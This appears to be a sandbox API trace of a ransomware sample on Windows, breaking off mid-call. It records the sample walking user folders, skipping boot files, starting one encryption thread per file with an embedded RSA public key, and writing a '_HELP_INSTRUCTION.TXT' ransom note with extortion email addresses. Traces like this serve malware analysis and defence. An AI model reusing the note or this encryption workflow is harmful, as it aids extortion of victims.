[0240.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0240.279] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="Desktop") returned 0x0 [0240.279] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="DESKTOP") returned 0x0 [0240.279] SetErrorMode (uMode=0x1) returned 0x1 [0240.279] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 66 [0240.279] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0240.279] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0240.279] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1288) returned 0x0 [0240.279] RegQueryValueExW (in: hKey=0x1288, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dc810, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dc810*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0240.279] RegCloseKey (hKey=0x1288) returned 0x0 [0240.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0240.279] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0240.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1288 [0240.279] CloseHandle (hObject=0x1288) returned 1 [0240.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0240.279] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0240.279] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0240.279] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0240.279] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0240.279] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0240.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0240.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0240.280] SetErrorMode (uMode=0x1) returned 0x1 [0240.280] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0240.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.280] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0240.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0240.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0240.280] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0240.280] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.280] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntldr") returned 0x0 [0240.280] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTLDR") returned 0x0 [0240.280] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.280] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.280] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0240.280] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0240.280] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0240.280] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.280] lstrcpyW (in: lpString1=0x17cf1c, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0240.280] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128c [0240.280] Sleep (dwMilliseconds=0x96) [0240.432] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.432] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2="..") returned 1 [0240.432] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2=".") returned 1 [0240.432] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.432] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntldr") returned 0x0 [0240.432] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTLDR") returned 0x0 [0240.433] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.433] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0240.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0240.433] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0240.433] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.433] lstrcpyW (in: lpString1=0x17cf1c, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0240.433] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1290 [0240.433] Sleep (dwMilliseconds=0x96) [0240.588] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.588] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2="..") returned 1 [0240.588] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2=".") returned 1 [0240.588] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.589] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntldr") returned 0x0 [0240.589] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTLDR") returned 0x0 [0240.589] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.589] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.589] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0240.589] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0240.589] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0240.589] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.589] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0240.589] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.589] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1294 [0240.589] Sleep (dwMilliseconds=0x96) [0240.744] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.744] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2="..") returned 1 [0240.744] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2=".") returned 1 [0240.745] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.745] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntldr") returned 0x0 [0240.745] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTLDR") returned 0x0 [0240.745] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.745] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.745] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0240.745] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0240.745] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0240.745] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.745] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0240.745] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1298 [0240.745] Sleep (dwMilliseconds=0x96) [0240.901] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0240.901] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2="..") returned 1 [0240.901] lstrcmpW (lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpString2=".") returned 1 [0240.901] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0240.901] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntldr") returned 0x0 [0240.901] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTLDR") returned 0x0 [0240.901] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0240.901] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0240.901] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0240.901] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0240.901] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0240.901] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.901] lstrcpyW (in: lpString1=0x17cf1c, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0240.901] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x129c [0240.901] Sleep (dwMilliseconds=0x96) [0241.061] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.061] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2="..") returned 1 [0241.061] lstrcmpW (lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpString2=".") returned 1 [0241.061] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.061] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntldr") returned 0x0 [0241.061] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTLDR") returned 0x0 [0241.061] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.061] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.061] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.061] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.061] lstrcpyW (in: lpString1=0x17cf1c, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0241.061] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12a0 [0241.062] WaitForSingleObject (hHandle=0x12a0, dwMilliseconds=0xffffffff) returned 0x0 [0241.063] Sleep (dwMilliseconds=0x96) [0241.212] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.212] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: 